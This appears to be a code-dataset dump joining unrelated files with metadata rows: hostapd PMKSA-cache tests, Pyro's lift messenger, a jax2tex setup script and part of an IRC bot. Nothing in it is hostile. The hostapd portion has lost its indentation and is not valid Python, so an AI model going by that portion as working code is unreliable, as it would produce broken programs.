dev[0].request("ROAM " + bssid2)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
pmksa2 = dev[0].get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry found")
if pmksa2['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
dev[0].dump_monitor()
logger.info("Roam back to AP1")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = dev[0].get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
def test_pmksa_cache_opportunistic(dev, apdev):
"""Opportunistic PMKSA caching"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
params['okc'] = "1"
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef", okc=True,
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
if pmksa['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
dev[0].dump_monitor()
logger.info("Roam to AP2")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid2)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa2 = dev[0].get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry created")
dev[0].dump_monitor()
logger.info("Roam back to AP1")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = dev[0].get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
def test_pmksa_cache_opportunistic_connect(dev, apdev):
"""Opportunistic PMKSA caching with connect API"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
params['okc'] = "1"
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="force_connect_cmd=1")
wpas.connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef", okc=True,
scan_freq="2412")
pmksa = wpas.get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
if pmksa['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
wpas.dump_monitor()
logger.info("Roam to AP2")
wpas.scan(freq="2412")
wpas.request("ROAM " + bssid2)
ev = wpas.wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa2 = wpas.get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry created")
wpas.dump_monitor()
logger.info("Roam back to AP1")
wpas.scan(freq="2412")
wpas.request("ROAM " + bssid)
ev = wpas.wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = wpas.get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
def test_pmksa_cache_expiration(dev, apdev):
"""PMKSA cache entry expiration"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].request("SET dot11RSNAConfigPMKLifetime 10")
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
logger.info("Wait for PMKSA cache entry to expire")
ev = dev[0].wait_event(["WPA: Key negotiation completed",
"CTRL-EVENT-DISCONNECTED"], timeout=15)
if ev is None:
raise Exception("No EAP reauthentication seen")
if "CTRL-EVENT-DISCONNECTED" in ev:
raise Exception("Unexpected disconnection")
pmksa2 = dev[0].get_pmksa(bssid)
if pmksa['pmkid'] == pmksa2['pmkid']:
raise Exception("PMKID did not change")
def test_pmksa_cache_expiration_disconnect(dev, apdev):
"""PMKSA cache entry expiration (disconnect)"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].request("SET dot11RSNAConfigPMKLifetime 2")
dev[0].request("SET dot11RSNAConfigPMKReauthThreshold 100")
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
hapd.request("SET auth_server_shared_secret incorrect")
logger.info("Wait for PMKSA cache entry to expire")
ev = dev[0].wait_event(["WPA: Key negotiation completed",
"CTRL-EVENT-DISCONNECTED"], timeout=15)
if ev is None:
raise Exception("No EAP reauthentication seen")
if "CTRL-EVENT-DISCONNECTED" not in ev:
raise Exception("Missing disconnection")
hapd.request("SET auth_server_shared_secret radius")
ev = dev[0].wait_event(["WPA: Key negotiation completed"], timeout=15)
if ev is None:
raise Exception("No EAP reauthentication seen")
pmksa2 = dev[0].get_pmksa(bssid)
if pmksa['pmkid'] == pmksa2['pmkid']:
raise Exception("PMKID did not change")
def test_pmksa_cache_and_cui(dev, apdev):
"""PMKSA cache and Chargeable-User-Identity"""
params = hostapd.wpa2_eap_params(ssid="cui")
params['radius_request_cui'] = '1'
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("cui", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
dev[0].dump_monitor()
logger.info("Disconnect and reconnect to the same AP")
dev[0].request("DISCONNECT")
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Reconnect timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = dev[0].get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
for i in range(0, 20):
state = dev[0].get_status_field("wpa_state")
if state == "COMPLETED":
break
time.sleep(0.1)
if state != "COMPLETED":
raise Exception("Reauthentication did not complete")
def test_pmksa_cache_preauth(dev, apdev):
"""RSN pre-authentication to generate PMKSA cache entry"""
try:
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['bridge'] = 'ap-br0'
hostapd.add_ap(apdev[0]['ifname'], params)
subprocess.call(['sudo', 'brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['sudo', 'ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
eap_connect(dev[0], apdev[0], "PAX", "pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef")
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['bridge'] = 'ap-br0'
params['rsn_preauth'] = '1'
params['rsn_preauth_interfaces'] = 'ap-br0'
hostapd.add_ap(apdev[1]['ifname'], params)
bssid1 = apdev[1]['bssid']
dev[0].scan(freq="2412")
success = False
status_seen = False
for i in range(0, 50):
if not status_seen:
status = dev[0].request("STATUS")
if "Pre-authentication EAPOL state machines:" in status:
status_seen = True
time.sleep(0.1)
pmksa = dev[0].get_pmksa(bssid1)
if pmksa:
success = True
break
if not success:
raise Exception("No PMKSA cache entry created from pre-authentication")
if not status_seen:
raise Exception("Pre-authentication EAPOL status was not available")
dev[0].scan(freq="2412")
if "[WPA2-EAP-CCMP-preauth]" not in dev[0].request("SCAN_RESULTS"):
raise Exception("Scan results missing RSN element info")
dev[0].request("ROAM " + bssid1)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa2 = dev[0].get_pmksa(bssid1)
if pmksa2 is None:
raise Exception("No PMKSA cache entry")
if pmksa['pmkid'] != pmksa2['pmkid']:
raise Exception("Unexpected PMKID change")
finally:
subprocess.call(['sudo', 'ip', 'link', 'set', 'dev', 'ap-br0', 'down'])
subprocess.call(['sudo', 'brctl', 'delbr', 'ap-br0'])
def test_pmksa_cache_disabled(dev, apdev):
"""PMKSA cache disabling on AP"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
params['disable_pmksa_caching'] = '1'
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
dev[0].dump_monitor()
logger.info("Roam to AP2")
dev[0].scan_for_bss(bssid2, freq="2412")
dev[0].request("ROAM " + bssid2)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
dev[0].dump_monitor()
logger.info("Roam back to AP1")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("EAP exchange missing")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Roaming with the AP timed out")
def test_pmksa_cache_ap_expiration(dev, apdev):
"""PMKSA cache entry expiring on AP"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-user-session-timeout",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[0].request("DISCONNECT")
time.sleep(5)
dev[0].dump_monitor()
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("EAP exchange missing")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Reassociation with the AP timed out")
dev[0].dump_monitor()
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=20)
if ev is None:
raise Exception("Disconnection event timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Reassociation with the AP timed out")
def test_pmksa_cache_multiple_sta(dev, apdev):
"""PMKSA cache with multiple stations"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-user-session-timeout",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[1].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[2].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-user-session-timeout",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
wpas.connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
logger.info("Roam to AP2")
for sta in [ dev[1], dev[0], dev[2], wpas ]:
sta.dump_monitor()
sta.scan_for_bss(bssid2, freq="2412")
sta.request("ROAM " + bssid2)
ev = sta.wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
ev = sta.wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
logger.info("Roam back to AP1")
for sta in [ dev[1], wpas, dev[0], dev[2] ]:
sta.dump_monitor()
sta.scan(freq="2412")
sta.dump_monitor()
sta.request("ROAM " + bssid)
ev = sta.wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
sta.dump_monitor()
time.sleep(4)
logger.info("Roam back to AP2")
for sta in [ dev[1], wpas, dev[0], dev[2] ]:
sta.dump_monitor()
sta.scan(freq="2412")
sta.dump_monitor()
sta.request("ROAM " + bssid2)
ev = sta.wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
sta.dump_monitor()
def test_pmksa_cache_opportunistic_multiple_sta(dev, apdev):
"""Opportunistic PMKSA caching with multiple stations"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
params['okc'] = "1"
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
for sta in [ dev[0], dev[1], dev[2], wpas ]:
sta.connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef", okc=True,
scan_freq="2412")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
logger.info("Roam to AP2")
for sta in [ dev[2], dev[0], wpas, dev[1] ]:
sta.dump_monitor()
sta.scan_for_bss(bssid2, freq="2412")
sta.request("ROAM " + bssid2)
ev = sta.wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa2 = sta.get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry created")
logger.info("Roam back to AP1")
for sta in [ dev[0], dev[1], dev[2], wpas ]:
sta.dump_monitor()
sta.scan_for_bss(bssid, freq="2412")
sta.request("ROAM " + bssid)
ev = sta.wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
|
gpl-2.0
| 8,156,492,690,407,084,000 | 40.453263 | 83 | 0.60845 | false |
uber/pyro
|
pyro/poutine/lift_messenger.py
|
1
|
4853
|
# Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
import warnings
from pyro import params
from pyro.distributions.distribution import Distribution
from pyro.poutine.util import is_validation_enabled
from .messenger import Messenger
class LiftMessenger(Messenger):
"""
Given a stochastic function with param calls and a prior distribution,
    create a stochastic function where all param calls are replaced by
    sampling from the prior. The prior should be a callable or a dict of
    names to callables.
Consider the following Pyro program:
>>> def model(x):
... s = pyro.param("s", torch.tensor(0.5))
... z = pyro.sample("z", dist.Normal(x, s))
... return z ** 2
>>> lifted_model = pyro.poutine.lift(model, prior={"s": dist.Exponential(0.3)})
``lift`` makes ``param`` statements behave like ``sample`` statements
using the distributions in ``prior``. In this example, site `s` will now behave
as if it was replaced with ``s = pyro.sample("s", dist.Exponential(0.3))``:
>>> tr = pyro.poutine.trace(lifted_model).get_trace(0.0)
>>> tr.nodes["s"]["type"] == "sample"
True
>>> tr2 = pyro.poutine.trace(lifted_model).get_trace(0.0)
>>> bool((tr2.nodes["s"]["value"] == tr.nodes["s"]["value"]).all())
False
:param fn: function whose parameters will be lifted to random values
:param prior: prior function in the form of a Distribution or a dict of stochastic fns
:returns: ``fn`` decorated with a :class:`~pyro.poutine.lift_messenger.LiftMessenger`
"""
def __init__(self, prior):
"""
:param prior: prior used to lift parameters. Prior can be of type
dict, pyro.distributions, or a python stochastic fn
Constructor
"""
super().__init__()
self.prior = prior
self._samples_cache = {}
def __enter__(self):
self._samples_cache = {}
if is_validation_enabled() and isinstance(self.prior, dict):
self._param_hits = set()
self._param_misses = set()
return super().__enter__()
def __exit__(self, *args, **kwargs):
self._samples_cache = {}
if is_validation_enabled() and isinstance(self.prior, dict):
extra = set(self.prior) - self._param_hits
if extra:
warnings.warn(
"pyro.module prior did not find params ['{}']. "
"Did you instead mean one of ['{}']?"
.format("', '".join(extra), "', '".join(self._param_misses)))
return super().__exit__(*args, **kwargs)
def _pyro_sample(self, msg):
return None
def _pyro_param(self, msg):
"""
Overrides the `pyro.param` call with samples sampled from the
distribution specified in the prior. The prior can be a
pyro.distributions object or a dict of distributions keyed
on the param names. If the param name does not match the
name the keys in the prior, that param name is unchanged.
"""
name = msg["name"]
param_name = params.user_param_name(name)
if isinstance(self.prior, dict):
# prior is a dict of distributions
if param_name in self.prior.keys():
msg["fn"] = self.prior[param_name]
msg["args"] = msg["args"][1:]
if isinstance(msg['fn'], Distribution):
msg["args"] = ()
msg["kwargs"] = {}
msg["infer"] = {}
if is_validation_enabled():
self._param_hits.add(param_name)
else:
if is_validation_enabled():
self._param_misses.add(param_name)
return None
elif isinstance(self.prior, Distribution):
# prior is a distribution
msg["fn"] = self.prior
msg["args"] = ()
msg["kwargs"] = {}
msg["infer"] = {}
elif callable(self.prior):
if not isinstance(self.prior, Distribution):
# prior is a stochastic fn. block sample
msg["stop"] = True
msg["fn"] = self.prior
msg["args"] = msg["args"][1:]
else:
# otherwise leave as is
return None
msg["type"] = "sample"
if name in self._samples_cache:
# Multiple pyro.param statements with the same
# name. Block the site and fix the value.
msg['value'] = self._samples_cache[name]['value']
msg["is_observed"] = True
msg["stop"] = True
else:
self._samples_cache[name] = msg
msg["is_observed"] = False
return self._pyro_sample(msg)
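# Usage sketch (a non-authoritative illustration mirroring the class docstring
# above; it assumes torch and pyro are importable and uses the public
# ``pyro.poutine.lift`` wrapper around this messenger):
#
#   import torch
#   import pyro
#   import pyro.distributions as dist
#
#   def model(x):
#       s = pyro.param("s", torch.tensor(0.5))
#       return pyro.sample("z", dist.Normal(x, s))
#
#   lifted_model = pyro.poutine.lift(model, prior={"s": dist.Exponential(0.3)})
#   tr = pyro.poutine.trace(lifted_model).get_trace(0.0)
#   assert tr.nodes["s"]["type"] == "sample"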
|
apache-2.0
| -165,752,808,491,558,800 | 37.824 | 91 | 0.553678 | false |
google-research/google-research
|
jax2tex/setup.py
|
1
|
2521
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Setup the package with pip."""
import os
import sys
import setuptools
# https://packaging.python.org/guides/making-a-pypi-friendly-readme/
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
INSTALL_REQUIRES = [
'jax', 'jaxlib'
]
def _get_version() -> str:
"""Returns the package version.
Adapted from:
https://github.com/deepmind/dm-haiku/blob/d4807e77b0b03c41467e24a247bed9d1897d336c/setup.py#L22
Returns:
Version number.
"""
path = '__init__.py'
version = '__version__'
with open(path) as fp:
for line in fp:
if line.startswith(version):
g = {}
exec(line, g) # pylint: disable=exec-used
return g[version] # pytype: disable=key-error
raise ValueError(f'`{version}` not defined in `{path}`.')
setuptools.setup(
name='jax2tex',
version=_get_version(),
license='Apache 2.0',
author='Google',
author_email='schsam@google.com',
install_requires=INSTALL_REQUIRES,
long_description=long_description,
long_description_content_type='text/markdown',
description='Convert jax functions to latex output.',
python_requires='>=3.6')
|
apache-2.0
| -6,288,696,118,159,902,000 | 30.123457 | 97 | 0.689409 | false |
s4w3d0ff/stirbot
|
stirbot/__init__.py
|
1
|
19959
|
#!/usr/bin/python
import time
import re
import logging
import socket
import ssl
from logging.handlers import RotatingFileHandler
from multiprocessing.dummy import Pool, Process
from multiprocessing import cpu_count
SSLPORTS = [6697, 7000, 7070]
NONSSLPORTS = [6665, 6666, 6667, 8000, 8001, 8002]
class CommandHandle(object):
""" Base Class for commands """
def __init__(self, regex, function):
if not isinstance(regex, list):
regex = [regex]
self.regex = regex
self.function = function
self.cregex = []
class Channel(object):
""" Base class for channels"""
def __init__(self):
self.users = {}
#{'name': 'ACC level'},
self.ops = []
self.voices = []
self.modes = []
self.topic = ""
class IRCServer(object):
""" Manages Irc server connection """
def __init__(
self, nick, host="chat.freenode.net",
autojoin=['#stirbot'], ssl=False, timeout=60*4,
threads=cpu_count()**3, pswrd=False
):
self.nick, self.host, self.pswrd = nick, host, pswrd
self.ssl, self.threads = ssl, threads
if not self.ssl:
self.port = 6666
else:
self.port = 7070
        self.timeout = timeout
self._listenThread = self._sock = None
self._connected = self._running = self._authed = False
self.channels, self.joinChans = {}, autojoin
self.commands = {}
self._pool = Pool(int(self.threads))
self._listenPool = Pool(int(self.threads))
self.nickserv = 'NickServ!NickServ@services.'
self.servHost = None
#-------------------------------------------------------------------------------
self._serverRe = {
'_002': CommandHandle(r'^:(.*) 002 (.*) :.*', self._got002),
'_Ping': CommandHandle(r'^PING :(.*)', self._pong),
'_Sniff': CommandHandle(
[
r'^:(.*)!(.*) PRIVMSG (.*) :(.*)',
r'^:(.*)!(.*) NOTICE (.*) :(.*)'
],
self._sniffMessage
),
'_332': CommandHandle(
[
r'^:(.*) 332 %s (.*) :(.*)' % self.nick,
r'^:(.*) TOPIC (.*) :(.*)'
],
self._updateTopic
),
'_353': CommandHandle(
r'^:.* 353 %s . (.*) :(.*)' % self.nick,
self._updateNames
),
'_Quit': CommandHandle(
r'^:(.*)!.* QUIT :', self._somebodyQuit
),
'_Modeset': CommandHandle(
r'^:.* MODE (.*) \+([A-Za-z]) (.*)', self._modeSet
),
'_Modeunset': CommandHandle(
r'^:.* MODE (.*) -([A-Za-z]) (.*)', self._modeUnset
),
'_Join': CommandHandle(
r'^:(.*)!.* JOIN (.*)', self._joinedUser
),
'_Part': CommandHandle(
r'^:(.*)!.* PART (.*) :.*', self._removeUser
),
'_ACC': CommandHandle(
r'^:(.+) NOTICE %s :(.+) ACC (\d)(.*)?' % self.nick,
self._updateACC
),
'_Identify': CommandHandle(
r'^:(.+) NOTICE (.+) :You are now identified for',
self._identified
)
}
def _got002(self, match):
""" Fills Serverhost name attribute"""
if match.group(2) == self.nick:
self.servHost = match.group(1)
logging.info("Our server host is: %s" % self.servHost)
def _pong(self, match):
""" Pong the Ping """
logging.debug(match.group(0))
if match.group(1) == self.servHost:
self._send("PONG :%s" % self.servHost)
def _identified(self, match):
""" Tells the bot it is authenticated with Nickserv """
logging.debug(match.group(0))
if match.group(1) == self.nickserv and match.group(2) == self.nick:
self._authed = True
logging.info('%s is authenticated with Nickserv!' % self.nick)
def _joinedUser(self, match):
""" Fires when a user joins a channel """
logging.debug(match.group(0))
nick, channel = match.group(1), match.group(2)
if channel not in self.channels:
self.channels[channel] = Channel()
self.channels[channel].users[nick] = 0
logging.info('%s joined %s' % (nick, channel))
def _somebodyQuit(self, match):
""" Fires when a user quits """
logging.debug(match.group(0))
nick = match.group(1)
# if it is us quiting
if nick == self.nick:
self.disconnect()
else:
for channel in self.channels:
if nick in self.channels[channel].users:
del self.channels[channel].users[nick]
                if nick in self.channels[channel].ops:
                    self.channels[channel].ops.remove(nick)
                if nick in self.channels[channel].voices:
                    self.channels[channel].voices.remove(nick)
logging.info('%s quit!' % nick)
    def _removeUser(self, match):
        """ Removes a user from a channel """
        logging.debug(match.group(0))
        nick, channel = match.group(1), match.group(2)
        if nick == self.nick:
            del self.channels[channel]
        else:
            del self.channels[channel].users[nick]
            if nick in self.channels[channel].ops:
                self.channels[channel].ops.remove(nick)
            if nick in self.channels[channel].voices:
                self.channels[channel].voices.remove(nick)
            logging.info('%s parted %s' % (nick, channel))
            logging.debug(self.channels[channel].users)
def _updateTopic(self, match):
""" Update the topic for a channel """
logging.debug(match.group(0))
host, channel, topic = match.group(1), match.group(2), match.group(3)
if channel not in self.channels:
self.channels[channel] = Channel()
self.channels[channel].topic = topic
logging.info('[%s] TOPIC: %s' % (channel, self.channels[channel].topic))
def _updateNames(self, match):
""" Takes names from a 353 and populates the channels users """
logging.debug(match.group(0))
channel, names = match.group(1), match.group(2).split(' ')
if channel not in self.channels:
self.channels[channel] = Channel()
for name in names:
if name[0] == '@':
name = name[1:]
if name not in self.channels[channel].ops:
self.channels[channel].ops.append(name)
if name[0] == '+':
name = name[1:]
if name not in self.channels[channel].voices:
self.channels[channel].voices.append(name)
if name not in self.channels[channel].users:
self.channels[channel].users[name] = 0
logging.info('[%s] USERS: %s' % (
channel, str(self.channels[channel].users)
))
logging.info('[%s] OPS: %s' % (
channel, str(self.channels[channel].ops)
))
logging.info('[%s] VOICES: %s' % (
channel, str(self.channels[channel].voices)
))
def _updateACC(self, match):
""" Updates an users ACC level """
logging.debug(match.group(0))
        nick, acc = match.group(2), int(match.group(3))
if match.group(1) == self.nickserv:
for channel in self.channels:
self.channels[channel].users[nick] = acc
logging.info('ACC: %s [%d]' % (nick, acc))
def _modeSet(self, match):
""" Adds mode flags to a user in the CHANNELS dict """
logging.debug(match.group(0))
channel, mode, nick = match.group(1), match.group(2), match.group(3)
if 'o' in mode or 'O' in mode:
if nick not in self.channels[channel].ops:
self.channels[channel].ops.append(nick)
if 'v' in mode or 'V' in mode:
if nick not in self.channels[channel].voices:
self.channels[channel].voices.append(nick)
logging.debug('OPS: %s' % str(self.channels[channel].ops))
logging.debug('VOICES: %s' % str(self.channels[channel].voices))
def _modeUnset(self, match):
""" Removes mode flags from a user in the CHANNELS dict """
logging.debug(match.group(0))
channel, mode, nick = match.group(1), match.group(2), match.group(3)
if 'o' in mode or 'O' in mode:
try:
self.channels[channel].ops.remove(nick)
except Exception as e:
logging.exception(e)
if 'v' in mode or 'V' in mode:
try:
self.channels[channel].voices.remove(nick)
except Exception as e:
logging.exception(e)
logging.debug('OPS: %s' % str(self.channels[channel].ops))
logging.debug('VOICES: %s' % str(self.channels[channel].voices))
#-------------------------------------------------------------------------------
def sendMessage(self, target, message):
""" Send a message """
self._send("PRIVMSG %s :%s" % (target, message))
def sendNotice(self, target, message):
""" Send a notice """
